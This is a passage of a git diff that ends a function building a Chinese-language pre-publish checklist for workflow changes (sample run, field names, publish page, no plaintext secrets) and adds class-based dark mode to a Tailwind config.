+    '- [ ] 用一条正常样例能跑通。',
+    '- [ ] 输出字段符合你的预期。',
+    '- [ ] 如果改了字段名，下游节点没有继续引用旧字段。',
+    '- [ ] 如果改了发布方式，发布页只展示应该出现的能力。',
+    '- [ ] 没有明文密钥、长期 token 或私人路径写进工作流目录。',
+    '',
+  ].join('\n');
+}
diff --git a/webui/tailwind.config.js b/webui/tailwind.config.js
index a9df11c5e..49e61e432 100644
--- a/webui/tailwind.config.js
+++ b/webui/tailwind.config.js
@@ -2,6 +2,7 @@ import typography from '@tailwindcss/typography'
 
 /** @type {import('tailwindcss').Config} */
 export default {
+  darkMode: 'class',
   content: [
     './index.html',
     './src/**/*.{js,ts,jsx,tsx}',
@@ -29,4 +30,4 @@ export default {
     },
   },
   plugins: [typography],
-}
\ No newline at end of file
+}